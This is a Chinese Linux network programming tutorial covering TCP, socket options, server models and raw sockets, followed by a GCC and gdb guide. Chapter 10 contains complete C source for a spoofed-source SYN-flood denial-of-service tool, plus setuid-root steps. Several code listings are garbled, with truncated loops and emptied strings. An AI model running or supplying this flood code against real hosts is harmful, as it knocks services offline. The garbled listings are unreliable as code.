rst为1的时候,表示请求重新连接 
syn为1的时候,表示请求建立连接 
fin为1的时候,表示亲戚关闭连接 
window窗口,告诉接收者可以接收的大小 
check对TCP数据进行较核 
urg_ptr如果urg=1,那么指出紧急数据对于历史数据开始的序列号的偏移值 
关于TCP协议的详细情况,请查看 RFC793 
7.6 TCP连接的建立 
TCP协议是一种可靠的连接,为了保证连接的可靠性,TCP的连接要分为几个步骤.我们把这 
个连接过程称为"三次握手"
下面我们从一个实例来分析建立连接的过程. 
第一步客户机向服务器发送一个TCP数据包,表示请求建立连接. 为此,客户端将数据包的 
SYN位设置为1,并且设置序列号seq=1000(我们假设为1000). 
第二步服务器收到了数据包,并从SYN位为1知道这是一个建立请求的连接.于是服务器也 
向客户端发送一个TCP数据包.因为是响应客户机的请求,于是服务器设置ACK为1,sak_se 
q=1001(1000+1)同时设置自己的序列号.seq=2000(我们假设为2000). 
第三步客户机收到了服务器的TCP,并从ACK为1和ack_seq=1001知道是从服务器来的确认 
信息.于是客户机也向服务器发送确认信息.客户机设置ACK=1,和ack_seq=2001,seq=100 
1,发送给服务器.至此客户端完成连接. 
最后一步服务器受到确认信息,也完成连接. 
通过上面几个步骤,一个TCP连接就建立了.当然在建立过程中可能出现错误,不过TCP协议 
可以保证自己去处理错误的. 
说一说其中的一种错误. 
听说过DOS吗?(可不是操作系统啊).今年春节的时候,美国的五大网站一起受到攻击.攻 
击者用的就是DOS(拒绝式服务)方式.概括的说一下原理. 
客户机先进行第一个步骤.服务器收到后,进行第二个步骤.按照正常的TCP连接,客户机 
应该进行第三个步骤. 
不过攻击者实际上并不进行第三个步骤.因为客户端在进行第一个步骤的时候,修改了自 
己的IP地址,就是说将一个实际上不存在的IP填充在自己IP数据包的发送者的IP一栏.这 
样因为服务器发的IP地址没有人接收,所以服务端会收不到第三个步骤的确认信号,这样 
服务务端会在那边一直等待,直到超时. 
这样当有大量的客户发出请求后,服务端会有大量等待,直到所有的资源被用光,而不能再 
接收客户机的请求. 
这样当正常的用户向服务器发出请求时,由于没有了资源而不能成功.于是就出现了春节 
时所出现的情况. 
---------------------------------------------------------------------------- 

网络编程(8) 

8. 套接字选项 
有时候我们要控制套接字的行为(如修改缓冲区的大小),这个时候我们就要控制套接字的 
选项了. 
8.1 getsockopt和setsockopt 
int getsockopt(int sockfd,int level,int optname,void *optval,socklen_t *optl 
en) 
int setsockopt(int sockfd,int level,int optname,const void *optval,socklen_t 
*optlen) 
level指定控制套接字的层次.可以取三种值: 1)SOL_SOCKET:通用套接字选项. 2)IPPRO 
TO_IP:IP选项. 3)IPPROTO_TCP:TCP选项. 
optname指定控制的方式(选项的名称),我们下面详细解释 
optval获得或者是设置套接字选项.根据选项名称的数据类型进行转换 
选项名称 说明 数据类型 
======================================================================== 
SOL_SOCKET 
------------------------------------------------------------------------ 
SO_BROADCAST 允许发送广播数据 int 
SO_DEBUG 允许调试 int 
SO_DONTROUTE 不查找路由 int 
SO_ERROR 获得套接字错误 int 
SO_KEEPALIVE 保持连接 int 
SO_LINGER 延迟关闭连接 struct linge 

SO_OOBINLINE 带外数据放入正常数据流 int 
SO_RCVBUF 接收缓冲区大小 int 
SO_SNDBUF 发送缓冲区大小 int 
SO_RCVLOWAT 接收缓冲区下限 int 
SO_SNDLOWAT 发送缓冲区下限 int 
SO_RCVTIMEO 接收超时 struct timev 
al 
SO_SNDTIMEO 发送超时 struct timev 
al 
SO_REUSERADDR 允许重用本地地址和端口 int 
SO_TYPE 获得套接字类型 int 
SO_BSDCOMPAT 与BSD系统兼容 int 
========================================================================== 
IPPROTO_IP 
-------------------------------------------------------------------------- 
IP_HDRINCL 在数据包中包含IP首部 int 
IP_OPTINOS IP首部选项 int 
IP_TOS 服务类型 
IP_TTL 生存时间 int 
========================================================================== 
IPPRO_TCP 
-------------------------------------------------------------------------- 
TCP_MAXSEG TCP最大数据段的大小 int 
TCP_NODELAY 不使用Nagle算法 int 
========================================================================= 
关于这些选项的详细情况请查看 Linux Programmer's Manual 
8.2 ioctl 
ioctl可以控制所有的文件描述符的情况,这里介绍一下控制套接字的选项. 
int ioctl(int fd,int req,...) 
========================================================================== 
ioctl的控制选项 
-------------------------------------------------------------------------- 
SIOCATMARK 是否到达带外标记 int 
FIOASYNC 异步输入/输出标志 int 
FIONREAD 缓冲区可读的字节数 int 
========================================================================== 
详细的选项请用 man ioctl_list 查看. 
-- 

网络编程(9) 

9. 服务器模型 
学习过《软件工程》吧.软件工程可是每一个程序员"必修"的课程啊.如果你没有学习过 
, 建议你去看一看. 在这一章里面,我们一起来从软件工程的角度学习网络编程的思想. 
在我们写程序之前, 我们都应该从软件工程的角度规划好我们的软件,这样我们开发软件 
的效率才会高. 在网络程序里面,一般的来说都是许多客户机对应一个服务器.为了处理 
客户机的请求, 对服务端的程序就提出了特殊的要求.我们学习一下目前最常用的服务器 
模型. 
循环服务器:循环服务器在同一个时刻只可以响应一个客户端的请求 
并发服务器:并发服务器在同一个时刻可以响应多个客户端的请求 
9.1 循环服务器:UDP服务器 
UDP循环服务器的实现非常简单:UDP服务器每次从套接字上读取一个客户端的请求,处理 
, 然后将结果返回给客户机. 
可以用下面的算法来实现. 
socket(...); 
bind(...); 
while(1) 

recvfrom(...); 
process(...); 
sendto(...); 

因为UDP是非面向连接的,没有一个客户端可以老是占住服务端. 只要处理过程不是死循 
环, 服务器对于每一个客户机的请求总是能够满足. 
9.2 循环服务器:TCP服务器 
TCP循环服务器的实现也不难:TCP服务器接受一个客户端的连接,然后处理,完成了这个客 
户的所有请求后,断开连接. 
算法如下: 
socket(...); 
bind(...); 
listen(...); 
while(1) 

accept(...); 
while(1) 

read(...); 
process(...); 
write(...); 

close(...); 

TCP循环服务器一次只能处理一个客户端的请求.只有在这个客户的所有请求都满足后, 
服务器才可以继续后面的请求.这样如果有一个客户端占住服务器不放时,其它的客户机 
都不能工作了.因此,TCP服务器一般很少用循环服务器模型的. 
9.3 并发服务器:TCP服务器 
为了弥补循环TCP服务器的缺陷,人们又想出了并发服务器的模型. 并发服务器的思想是 
每一个客户机的请求并不由服务器直接处理,而是服务器创建一个 子进程来处理. 
算法如下: 
socket(...); 
bind(...); 
listen(...); 
while(1) 

accept(...); 
if(fork(..)==0) 

while(1) 

read(...); 
process(...); 
write(...); 

close(...); 
exit(...); 

close(...); 

TCP并发服务器可以解决TCP循环服务器客户机独占服务器的情况. 不过也同时带来了一 
个不小的问题.为了响应客户机的请求,服务器要创建子进程来处理. 而创建子进程是一 
种非常消耗资源的操作. 
9.4 并发服务器:多路复用I/O 
为了解决创建子进程带来的系统资源消耗,人们又想出了多路复用I/O模型. 
首先介绍一个函数select 
int select(int nfds,fd_set *readfds,fd_set *writefds, 
fd_set *except fds,struct timeval *timeout) 
void FD_SET(int fd,fd_set *fdset) 
void FD_CLR(int fd,fd_set *fdset) 
void FD_ZERO(fd_set *fdset) 
int FD_ISSET(int fd,fd_set *fdset) 
一般的来说当我们在向文件读写时,进程有可能在读写出阻塞,直到一定的条件满足. 比 
如我们从一个套接字读数据时,可能缓冲区里面没有数据可读(通信的对方还没有 发送数 
据过来),这个时候我们的读调用就会等待(阻塞)直到有数据可读.如果我们不 希望阻塞 
,我们的一个选择是用select系统调用. 只要我们设置好select的各个参数,那么当文件 
可以读写的时候select回"通知"我们 说可以读写了. readfds所有要读的文件文件描述 
符的集合 
writefds所有要的写文件文件描述符的集合 
exceptfds其他的服要向我们通知的文件描述符 
timeout超时设置. 
nfds所有我们监控的文件描述符中最大的那一个加1 
在我们调用select时进程会一直阻塞直到以下的一种情况发生. 1)有文件可以读.2)有文 
件可以写.3)超时所设置的时间到. 
为了设置文件描述符我们要使用几个宏. FD_SET将fd加入到fdset 
FD_CLR将fd从fdset里面清除 
FD_ZERO从fdset中清除所有的文件描述符 
FD_ISSET判断fd是否在fdset集合中 
使用select的一个例子 
int use_select(int *readfd,int n) 

fd_set my_readfd; 
int maxfd; 
int i; 
maxfd=readfd[0]; 
for(i=1;iif(readfd>maxfd) maxfd=readfd
while(1) 

/* 将所有的文件描述符加入 */ 
FD_ZERO(&my_readfd); 
for(i=0;iFD_SET(readfd,*my_readfd); 
/* 进程阻塞 */ 
select(maxfd+1,& my_readfd,NULL,NULL,NULL); 
/* 有东西可以读了 */ 
for(i=0;iif(FD_ISSET(readfd,&my_readfd)) 

/* 原来是我可以读了 */ 
we_read(readfd); 



使用select后我们的服务器程序就变成了. 
初始话(socket,bind,listen); 
while(1) 

设置监听读写文件描述符(FD_*); 
调用select; 
如果是倾听套接字就绪,说明一个新的连接请求建立 

建立连接(accept); 
加入到监听文件描述符中去; 

否则说明是一个已经连接过的描述符 

进行操作(read或者write); 


多路复用I/O可以解决资源限制的问题.着模型实际上是将UDP循环模型用在了TCP上面. 
这也就带来了一些问题.如由于服务器依次处理客户的请求,所以可能会导致有的客户 会 
等待很久. 
9.5 并发服务器:UDP服务器 
人们把并发的概念用于UDP就得到了并发UDP服务器模型. 并发UDP服务器模型其实是简单 
的.和并发的TCP服务器模型一样是创建一个子进程来处理的 算法和并发的TCP模型一样 
.. 
除非服务器在处理客户端的请求所用的时间比较长以外,人们实际上很少用这种模型. 
9.6 一个并发TCP服务器实例 
#include  
#include  
#include  
#include  
#include  
#define MY_PORT 8888 
int main(int argc ,char **argv) 

int listen_fd,accept_fd; 
struct sockaddr_in client_addr; 
int n; 
if((listen_fd=socket(AF_INET,SOCK_STREAM,0))<0) 

printf("Socket Error:%s\n\a",strerror(errno)); 
exit(1); 

bzero(&client_addr,sizeof(struct sockaddr_in)); 
client_addr.sin_family=AF_INET; 
client_addr.sin_port=htons(MY_PORT); 
client_addr.sin_addr.s_addr=htonl(INADDR_ANY); 
n=1; 
/* 如果服务器终止后,服务器可以第二次快速启动而不用等待一段时间 */ 
setsockopt(listen_fd,SOL_SOCKET,SO_REUSEADDR,&n,sizeof(int)); 
if(bind(listen_fd,(struct sockaddr *)&client_addr,sizeof(client_addr))<0) 

printf("Bind Error:%s\n\a",strerror(errno)); 
exit(1); 

listen(listen_fd,5); 
while(1) 

accept_fd=accept(listen_fd,NULL,NULL); 
if((accept_fd<0)&&(errno==EINTR)) 
continue; 
else if(accept_fd<0) 

printf("Accept Error:%s\n\a",strerror(errno)); 
continue; 

if((n=fork())==0) 

/* 子进程处理客户端的连接 */ 
char buffer[1024]; 
close(listen_fd); 
n=read(accept_fd,buffer,1024); 
write(accept_fd,buffer,n); 
close(accept_fd); 
exit(0); 

else if(n<0) 
printf("Fork Error:%s\n\a",strerror(errno)); 
close(accept_fd); 


你可以用我们前面写客户端程序来调试着程序,或者是用来telnet调试 
-- 

网络编程(10) 

10. 原始套接字 
我们在前面已经学习过了网络程序的两种套接字(SOCK_STREAM,SOCK_DRAGM).在这一章 
里面我们一起来学习另外一种套接字--原始套接字(SOCK_RAW). 应用原始套接字,我们可 
以编写出由TCP和UDP套接字不能够实现的功能. 注意原始套接字只能够由有root权限的 
人创建. 
10.1 原始套接字的创建 
int sockfd(AF_INET,SOCK_RAW,protocol) 
可以创建一个原始套接字.根据协议的类型不同我们可以创建不同类型的原始套接字 比 
如:IPPROTO_ICMP,IPPROTO_TCP,IPPROTO_UDP等等.详细的情况查看  下 
面我们以一个实例来说明原始套接字的创建和使用 
10.2 一个原始套接字的实例 
还记得DOS是什么意思吗?在这里我们就一起来编写一个实现DOS的小程序. 下面是程序的 
源代码 
/******************** DOS.c *****************/ 
#include  
#include  
#include  
#include  
#include  
#include  
#include  
#include  
#include  
#define DESTPORT 80 /* 要攻击的端口(WEB) */ 
#define LOCALPORT 8888 
void send_tcp(int sockfd,struct sockaddr_in *addr); 
unsigned short check_sum(unsigned short *addr,int len); 
int main(int argc,char **argv) 

int sockfd; 
struct sockaddr_in addr; 
struct hostent *host; 
int on=1; 
if(argc!=2) 

fprintf(stderr,"Usage:%s hostname\n\a",argv[0]); 
exit(1); 

bzero(&addr,sizeof(struct sockaddr_in)); 
addr.sin_family=AF_INET; 
addr.sin_port=htons(DESTPORT); 
if(inet_aton(argv[1],&addr.sin_addr)==0) 

host=gethostbyname(argv[1]); 
if(host==NULL) 

fprintf(stderr,"HostName Error:%s\n\a",hstrerror(h_errno)); 
exit(1); 

addr.sin_addr=*(struct in_addr *)(host->h_addr_list[0]); 

/**** 使用IPPROTO_TCP创建一个TCP的原始套接字 ****/ 
sockfd=socket(AF_INET,SOCK_RAW,IPPROTO_TCP); 
if(sockfd<0) 

fprintf(stderr,"Socket Error:%s\n\a",strerror(errno)); 
exit(1); 

/******** 设置IP数据包格式,告诉系统内核模块IP数据包由我们自己来填写 ***/ 
setsockopt(sockfd,IPPROTO_IP,IP_HDRINCL,&on,sizeof(on)); 
/**** 没有办法,只用超级护用户才可以使用原始套接字 *********/ 
setuid(getpid()); 
/********* 发送炸弹了!!!! ****/ 
send_tcp(sockfd,&addr); 

/******* 发送炸弹的实现 *********/ 
void send_tcp(int sockfd,struct sockaddr_in *addr) 

char buffer[100]; /**** 用来放置我们的数据包 ****/ 
struct ip *ip; 
struct tcphdr *tcp; 
int head_len; 
/******* 我们的数据包实际上没有任何内容,所以长度就是两个结构的长度 ***/ 
head_len=sizeof(struct ip)+sizeof(struct tcphdr); 
bzero(buffer,100); 
/******** 填充IP数据包的头部,还记得IP的头格式吗? ******/ 
ip=(struct ip *)buffer; 
ip->ip_v=IPVERSION; /** 版本一般的是 4 **/ 
ip->ip_hl=sizeof(struct ip)>>2; /** IP数据包的头部长度 **/ 
ip->ip_tos=0; /** 服务类型 **/ 
ip->ip_len=htons(head_len); /** IP数据包的长度 **/ 
ip->ip_id=0; /** 让系统去填写吧 **/ 
ip->ip_off=0; /** 和上面一样,省点时间 **/ 
ip->ip_ttl=MAXTTL; /** 最长的时间 255 **/ 
ip->ip_p=IPPROTO_TCP; /** 我们要发的是 TCP包 **/ 
ip->ip_sum=0; /** 校验和让系统去做 **/ 
ip->ip_dst=addr->sin_addr; /** 我们攻击的对象 **/ 
/******* 开始填写TCP数据包 *****/ 
tcp=(struct tcphdr *)(buffer +sizeof(struct ip)); 
tcp->source=htons(LOCALPORT); 
tcp->dest=addr->sin_port; /** 目的端口 **/ 
tcp->seq=random(); 
tcp->ack_seq=0; 
tcp->doff=5; 
tcp->syn=1; /** 我要建立连接 **/ 
tcp->check=0; 
/** 好了,一切都准备好了.服务器,你准备好了没有?? ^_^ **/ 
while(1) 

/** 你不知道我是从那里来的,慢慢的去等吧! **/ 
ip->ip_src.s_addr=random(); 
/** 什么都让系统做了,也没有多大的意思,还是让我们自己来校验头部吧 */ 
/** 下面这条可有可无 */ 
tcp->check=check_sum((unsigned short *)tcp, 
sizeof(struct tcphdr)); 
sendto(sockfd,buffer,head_len,0,addr,sizeof(struct sockaddr_in)); 


/* 下面是首部校验和的算法,偷了别人的 */ 
unsigned short check_sum(unsigned short *addr,int len) 

register int nleft=len; 
register int sum=0; 
register short *w=addr; 
short answer=0; 
while(nleft>1) 

sum+=*w++; 
nleft-=2; 

if(nleft==1) 

*(unsigned char *)(&answer)=*(unsigned char *)w; 
sum+=answer; 

sum=(sum>>16)+(sum&0xffff); 
sum+=(sum>>16); 
answer=~sum; 
return(answer); 

编译一下,拿localhost做一下实验,看看有什么结果.(千万不要试别人的啊). 为了让普 
通用户可以运行这个程序,我们应该将这个程序的所有者变为root,且 设置setuid位 
[root@hoyt /root]#chown root DOS 
[root@hoyt /root]#chmod +s DOS 
10.3 总结 
原始套接字和一般的套接字不同的是以前许多由系统做的事情,现在要由我们自己来做了 
.. 不过这里面是不是有很多的乐趣呢. 当我们创建了一个TCP套接字的时候,我们只是负 
责把我们要发送的内容(buffer)传递给了系统. 系统在收到我们的数据后,回自动的调用 
相应的模块给数据加上TCP头部,然后加上IP头部. 再发送出去.而现在是我们自己创建各 
个的头部,系统只是把它们发送出去. 在上面的实例中,由于我们要修改我们的源IP地址 
,所以我们使用了setsockopt函数,如果我们只是修改TCP数据,那么IP数据一样也可以由 
系统来创建的. 
-- 

网络编程(11) 

11. 后记 
总算完成了网络编程这个教程.算起来我差不多写了一个星期,原来以为写这个应该是 
一件 不难的事,做起来才知道原来有很多的地方都比我想象的要难.我还把很多的东西都 
省略掉了 不过写完了这篇教程以后,我好象对网络的认识又增加了一步. 
如果我们只是编写一般的 网络程序还是比较容易的,但是如果我们想写出比较好的网 
络程序我们还有着遥远的路要走. 网络程序一般的来说都是多进程加上多线程的.为了处 
理好他们内部的关系,我们还要学习 进程之间的通信.在网络程序里面有着许许多多的突 
发事件,为此我们还要去学习更高级的 事件处理知识.现在的信息越来越多了,为了处理 
好这些信息,我们还要去学习数据库. 如果要编写出有用的黑客软件,我们还要去熟悉各 
种网络协议.总之我们要学的东西还很多很多. 
看一看外国的软件水平,看一看印度的软件水平,宝岛台湾的水平,再看一看我们自己的 
软件水平大家就会知道了什么叫做差距.我们现在用的软件有几个是我们中国人自己编 
写的. 
不过大家不要害怕,不用担心.只要我们还是清醒的,还能够认清我们和别人的差距, 我 
们就还有希望. 毕竟我们现在还年轻.只要我们努力,认真的去学习,我们一定能够学好的 
..我们就可以追上别人直到超过别人! 
相信一点: 
别人可以做到的我们一样可以做到,而且可以比别人做的更好! 
勇敢的年轻人,为了我们伟大祖国的软件产业,为了祖国的未来,努力的去奋斗吧!祖国 
会记住你们的! 
hoyt 
11.1 参考资料 
<<实用UNIX编程>>---机械工业出版社. 
<>--清华大学出版社. 

9)Linux下C开发工具介绍 

Linux的发行版中包含了很多软件开发工具. 它们中的很多是用于 C 和 C++应用程序开发 
的. 本文介绍了在 Linux 下能用于 C 应用程序开发和调试的工具. 本文的主旨是介绍如 
何在 Linux 下使用 C 编译器和其他 C 编程工具, 而非 C 语言编程的教程. 

GNU C 编译器 
GNU C 编译器(GCC)是一个全功能的 ANSI C 兼容编译器. 如果你熟悉其他操作系统或硬 
件平台上的一种 C 编译器, 你将能很快地掌握 GCC. 本节将介绍如何使用 GCC 和一些 
GCC 编译器最常用的选项. 

使用 GCC 
通常后跟一些选项和文件名来使用 GCC 编译器. gcc 命令的基本用法如下: 

gcc [options] [filenames] 
命令行选项指定的操作将在命令行上每个给出的文件上执行. 下一小节将叙述一些你会最 
常用到的选项. 

GCC 选项 
GCC 有超过100个的编译选项可用. 这些选项中的许多你可能永远都不会用到, 但一些主 
要的选项将会频繁用到. 很多的 GCC 选项包括一个以上的字符. 因此你必须为每个选项 
指定各自的连字符, 并且就象大多数 Linux 命令一样你不能在一个单独的连字符后跟一 
组选项. 例如, 下面的两个命令是不同的: 

gcc -p -g test.c 

gcc -pg test.c 
第一条命令告诉 GCC 编译 test.c 时为 prof 命令建立剖析(profile)信息并且把调试信 
息加入到可执行的文件里. 第二条命令只告诉 GCC 为 gprof 命令建立剖析信息. 

当你不用任何选项编译一个程序时, GCC 将会建立(假定编译成功)一个名为 a.out 的可 
执行文件. 例如, 下面的命令将在当前目录下产生一个叫 a.out 的文件: 

gcc test.c 
你能用 -o 编译选项来为将产生的可执行文件指定一个文件名来代替 a.out. 例如, 将一 
个叫 count.c 的 C 程序编译为名叫 count 的可执行文件, 你将输入下面的命令: 

gcc -o count count.c 

------------------------------------------------------------------------------ 
-- 

注意: 当你使用 -o 选项时, -o 后面必须跟一个文件名. 

------------------------------------------------------------------------------ 
-- 

GCC 同样有指定编译器处理多少的编译选项. -c 选项告诉 GCC 仅把源代码编译为目标代 
码而跳过汇编和连接的步骤. 这个选项使用的非常频繁因为它使得编译多个 C 程序时速 
度更快并且更易于管理. 缺省时 GCC 建立的目标代码文件有一个 .o 的扩展名. 

-S 编译选项告诉 GCC 在为 C 代码产生了汇编语言文件后停止编译. GCC 产生的汇编语 
言文件的缺省扩展名是 .s . -E 选项指示编译器仅对输入文件进行预处理. 当这个选项 
被使用时, 预处理器的输出被送到标准输出而不是储存在文件里. 

优 化 选 项 
当你用 GCC 编译 C 代码时, 它会试着用最少的时间完成编译并且使编译后的代码易于调 
试. 易于调试意味着编译后的代码与源代码有同样的执行次序, 编译后的代码没有经过优 
化. 有很多选项可用于告诉 GCC 在耗费更多编译时间和牺牲易调试性的基础上产生更小 
更快的可执行文件. 这些选项中最典型的是-O 和 -O2 选项. 

-O 选项告诉 GCC 对源代码进行基本优化. 这些优化在大多数情况下都会使程序执行的更 
快. -O2 选项告诉 GCC 产生尽可能小和尽可能快的代码. -O2 选项将使编译的速度比使 
用 -O 时慢. 但通常产生的代码执行速度会更快. 

除了 -O 和 -O2 优化选项外, 还有一些低级选项用于产生更快的代码. 这些选项非常的 
特殊, 而且最好只有当你完全理解这些选项将会对编译后的代码产生什么样的效果时再去 
使用. 这些选项的详细描述, 请参考 GCC 的指南页, 在命令行上键入 man gcc . 

调试和剖析选项 
GCC 支持数种调试和剖析选项. 在这些选项里你会最常用到的是 -g 和 -pg 选项. 
-g 选项告诉 GCC 产生能被 GNU 调试器使用的调试信息以便调试你的程序. GCC 提供了 
一个很多其他 C 编译器里没有的特性, 在 GCC 里你能使 -g 和 -O (产生优化代码)联用 
.. 这一点非常有用因为你能在与最终产品尽可能相近的情况下调试你的代码. 在你同时使 
用这两个选项时你必须清楚你所写的某些代码已经在优化时被 GCC 作了改动. 关于调试 
C 程序的更多信息请看下一节"用 gdb 调试 C 程序" . 
-pg 选项告诉 GCC 在你的程序里加入额外的代码, 执行时, 产生 gprof 用的剖析信息以 
显示你的程序的耗时情况. 关于 gprof 的更多信息请参考 "gprof" 一节. 

用 gdb 调试 GCC 程序 
Linux 包含了一个叫 gdb 的 GNU 调试程序. gdb 是一个用来调试 C 和 C++ 程序的强力 
调试器. 它使你能在程序运行时观察程序的内部结构和内存的使用情况. 以下是 gdb 所 
提供的一些功能: 

它使你能监视你程序中变量的值. 
它使你能设置断点以使程序在指定的代码行上停止执行. 
它使你能一行行的执行你的代码. 

在命令行上键入 gdb 并按回车键就可以运行 gdb 了, 如果一切正常的话, gdb 将被启动 
并且你将在屏幕上看到类似的内容: 

GNU gdb 5.0 
Copyright 2000 Free Software Foundation, Inc. 
GDB is free software, covered by the GNU General Public License, and you are 
welcome to change it and/or distribute copies of it under certain conditions. 
Type "show copying" to see the conditions. 
There is absolutely no warranty for GDB. Type "show warranty" for details. 
This GDB was configured as "i386-redhat-linux"
(gdb) 
当你启动 gdb 后, 你能在命令行上指定很多的选项. 你也可以以下面的方式来运行 gdb 


gdb  
当你用这种方式运行 gdb , 你能直接指定想要调试的程序. 这将告诉gdb 装入名为 
fname 的可执行文件. 你也可以用 gdb 去检查一个因程序异常终止而产生的 core 文件, 
或者与一个正在运行的程序相连. 你可以参考 gdb 指南页或在命令行上键入 gdb -h 得 
到一个有关这些选项的说明的简单列表. 

为调试编译代码(Compiling Code for Debugging) 
为了使 gdb 正常工作, 你必须使你的程序在编译时包含调试信息. 调试信息包含你程序 
里的每个变量的类型和在可执行文件里的地址映射以及源代码的行号. gdb 利用这些信 
息使源代码和机器码相关联. 

在编译时用 -g 选项打开调试选项. 

gdb 基本命令 
gdb 支持很多的命令使你能实现不同的功能. 这些命令从简单的文件装入到允许你检查所 
调用的堆栈内容的复杂命令, 表27.1列出了你在用 gdb 调试时会用到的一些命令. 想了 
解 gdb 的详细使用请参考 gdb 的指南页. 

基本 gdb 命令. 

命 令 描 述 
file 装入想要调试的可执行文件. 
kill 终止正在调试的程序. 
list 列出产生执行文件的源代码的一部分. 
next 执行一行源代码但不进入函数内部. 
step 执行一行源代码而且进入函数内部. 
run 执行当前被调试的程序 
quit 终止 gdb 
watch 使你能监视一个变量的值而不管它何时被改变. 
print 显示表达式的值 
break 在代码里设置断点, 这将使程序执行到这里时被挂起. 
make 使你能不退出 gdb 就可以重新产生可执行文件. 
shell 使你能不离开 gdb 就执行 UNIX shell 命令. 

gdb 支持很多与 UNIX shell 程序一样的命令编辑特征. 你能象在 bash 或 tcsh里那样 
按 Tab 键让 gdb 帮你补齐一个唯一的命令, 如果不唯一的话 gdb 会列出所有匹配的命 
令. 你也能用光标键上下翻动历史命令. 

gdb 应用举例 
本节用一个实例教你一步步的用 gdb 调试程序. 被调试的程序相当的简单, 但它展示了 
gdb 的典型应用. 

下面列出了将被调试的程序. 这个程序被称为 hello , 它显示一个简单的问候, 再用反 
序将它列出. 

#include  

static void my_print (char *); 
static void my_print2 (char *); 

main () 

char my_string[] = "hello world!"
my_print (my_string); 
my_print2 (my_string); 


void my_print (char *string) 

printf ("The string is %s ", string); 


void my_print2 (char *string) 

char *string2; 
int size, i; 

size = strlen (string); 
string2 = (char *) malloc (size + 1); 
for (i = 0; i < size; i++) 
string2[size - i] = string
string2[size+1] = ''

printf ("The string printed backward is %s ", string2); 

用下面的命令编译它: 

gcc -g -o hello hello.c 
这个程序执行时显示如下结果: 
../hello 
The string is hello world! 

The string printed backward is 
输出的第一行是正确的, 但第二行打印出的东西并不是我们所期望的. 我们所设想的输出 
应该是: 

The string printed backward is !dlrow olleh 
由于某些原因, my_print2 函数没有正常工作. 让我们用 gdb 看看问题究竟出在哪儿, 
先键入如下命令: 

gdb hello 

------------------------------------------------------------------------------ 
-- 

注意: 记得在编译 hello 程序时把调试选项打开. 

------------------------------------------------------------------------------ 
-- 

如果你在输入命令时忘了把要调试的程序作为参数传给 gdb , 你可以在 gdb 提示符下用 
file 命令来载入它: 

(gdb) file hello 
这个命令将载入 hello 可执行文件就象你在 gdb 命令行里装入它一样. 

这时你能用 gdb 的 run 命令来运行 hello 了. 当它在 gdb 里被运行后结果大约会象这 
样: 

(gdb) run 

Starting program: /root/hello 

The string is hello world! 

The string printed backward is 

Program exited with code 040 
这个输出和在 gdb 外面运行的结果一样. 问题是, 为什么反序打印没有工作? 为了找出 
症结所在, 我们可以在 my_print2 函数的 for 语句后设一个断点, 具体的做法是在 gdb 
提示符下键入 list 命令三次, 列出源代码: 

(gdb) list 

(gdb) list 

(gdb) list 

------------------------------------------------------------------------------ 
-- 

技巧: 在 gdb 提示符下按回车健将重复上一个命令. 

------------------------------------------------------------------------------ 
-- 

第一次键入 list 命令的输出如下: 

1 #include  

3 static void my_print (char *); 
4 static void my_print2 (char *); 

6 main () 
7 { 
8 char my_string[] = "hello world!"
9 my_print (my_string); 
10 my_print2 (my_string); 

如果按下回车, gdb 将再执行一次 list 命令, 给出下列输出: 

11 } 
12 
13 void my_print (char *string) 
14 { 
15 printf ("The string is %s ", string); 
16 } 
17 
18 void my_print2 (char *string) 
19 { 
20 char *string2; 
再按一次回车将列出 hello 程序的剩余部分: 

21 int size, i; 
22 
23 size = strlen (string); 
24 string2 = (char *) malloc (size + 1); 
25 for (i = 0; i < size; i++) 
26 string2[size - i] = string
27 string2[size+1] = ''
28 
29 printf ("The string printed backward is %s ", string2); 
30 } 
根据列出的源程序, 你能看到要设断点的地方在第26行, 在 gdb 命令行提示符下键入如 
下命令设置断点: 

(gdb) break 26 
gdb 将作出如下的响应: 

Breakpoint 1 at 0x804857c: file hello.c, line 26. 

(gdb) 

现在再键入 run 命令, 将产生如下的输出: 

Starting program: /root/hello 

The string is hello world! 

Breakpoint 1, my_print2 (string=0xbffffab0 "hello world!") at hello.c:26 
26 string2[size - i] = string
你能通过设置一个观察 string2[size - i] 变量的值的观察点来看出错误是怎样产生的, 
做法是键入: 

(gdb) watch string2[size - i] 
gdb 将作出如下回应: 

Hardware watchpoint 2: string2[size - i] 
现在可以用 next 命令来一步步的执行 for 循环了: 

(gdb) next 
经过第一次循环后, gdb 告诉我们 string2[size - i] 的值是 `h`. gdb 用如下的显示 
来告诉你这个信息: 

Hardware watchpoint 2: string2[size - i] 

Old value = 0 '00' 
New value = 104 'h' 
my_print2 (string=0xbffffab0 "hello world!") at hello.c:25 
25 for (i = 0; i < size; i++) 
这个值正是期望的. 后来的数次循环的结果都是正确的. 当 i=11 时, 表达式 
string2[size - i] 的值等于 `!`, size - i 的值等于 1, 最后一个字符已经拷到新串 
里了. 

如果你再把循环执行下去, 你会看到已经没有值分配给 string2[0] 了, 而它是新串的 
第一个字符, 因为 malloc 函数在分配内存时把它们初始化为空(null)字符. 所以 
string2 的第一个字符是空字符. 这解释了为什么在打印 string2 时没有任何输出了. 

现在找出了问题出在哪里, 修正这个错误是很容易的. 你得把代码里写入 string2 的第 
一个字符的的偏移量改为 size - 1 而不是 size. 这是因为 string2 的大小为 12, 但 
起始偏移量是 0, 串内的字符从偏移量 0 到 偏移量 10, 偏移量 11 为空字符保留. 

改正方法非常简单. 这是这种解决办法的代码: 

#include  

static void my_print (char *); 
static void my_print2 (char *); 

main () 

char my_string[] = "hello world!"
my_print (my_string); 
my_print2 (my_string); 


void my_print (char *string) 

printf ("The string is %s ", string); 


void my_print2 (char *string) 

char *string2; 
int size, i; 

size = strlen (string); 
string2 = (char *) malloc (size + 1); 
for (i = 0; i < size; i++) 
string2[size -1 - i] = string
string2[size] = ''

printf ("The string printed backward is %s ", string2); 

如果程序产生了core文件,可以用gdb hello core命令来查看程序在何处出错。如在函数 
my_print2()中,如果忘记了给string2分配内存 string2 = (char *) malloc (size + 
1);,很可能就会core dump. 

另外的 C 编程工具 

xxgdb 
xxgdb 是 gdb 的一个基于 X Window 系统的图形界面. xxgdb 包括了命令行版的 gdb 
上的所有特性. xxgdb 使你能通过按按钮来执行常用的命令. 设置了断点的地方也用图 
形来显示. 

你能在一个 Xterm 窗口里键入下面的命令来运行它: 

xxgdb 
你能用 gdb 里任何有效的命令行选项来初始化 xxgdb . 此外 xxgdb 也有一些特有的命 
令行选项, 表 27.2 列出了这些选项. 

表 27.2. xxgdb 命令行选项. 

选 项 描 述 
db_name 指定所用调试器的名字, 缺省是 gdb. 
db_prompt 指定调试器提示符, 缺省为 gdb. 
gdbinit 指定初始化 gdb 的命令文件的文件名, 缺省为 .gdbinit. 

nx 告诉 xxgdb 不执行 .gdbinit 文件. 
